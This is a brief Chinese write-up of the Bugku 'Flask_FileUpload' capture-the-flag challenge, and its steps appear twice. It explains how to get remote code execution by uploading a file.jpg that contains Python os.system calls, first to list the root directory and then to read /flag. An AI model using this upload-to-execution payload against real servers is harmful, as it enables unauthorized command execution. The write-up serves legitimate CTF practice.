Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码
import os
os.system('ls / ')
上传后查看源代码,找到flag文件夹

修改代码
import os
os.system('cat /flag ')

查看源代码,提示用python返回结果
在file.jpg中写python代码
import os
os.system('ls / ')
上传后查看源代码,找到flag文件夹
修改代码
import os
os.system('cat /flag ')